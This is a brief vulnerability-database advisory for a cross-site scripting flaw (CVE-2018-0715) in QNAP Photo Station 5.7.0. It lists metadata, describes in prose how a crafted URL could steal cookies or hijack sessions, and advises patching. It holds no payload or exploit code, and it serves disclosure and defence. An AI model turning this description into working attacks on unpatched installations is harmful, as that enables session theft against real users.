vendor: Photo Station
by: Mitsuaki (Mitch) Shiraishi
CVSS: 6.1 (MEDIUM)
CWE: 79 (Cross-Site Scripting)
Product Name: Photo Station
Affected Version From: 5.7.0
Affected Version To: 5.7.0
Patch Exists: Yes
Related CVE: CVE-2018-0715
CPE: a:qnap:photo_station
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018
QNAP Photo Station 5.7.0 – Cross-Site Scripting
QNAP Photo Station versions 5.7.0 and earlier are vulnerable to Cross-Site Scripting (XSS). An attacker can inject malicious JavaScript code into the application by sending a specially crafted URL to the vulnerable application. This code will be executed in the context of the user's browser, allowing the attacker to perform various malicious activities such as stealing cookies, hijacking the user's session, and redirecting the user to malicious websites.
Mitigation:
QNAP has released a patch to address this vulnerability. Users should update to the latest version of QNAP Photo Station.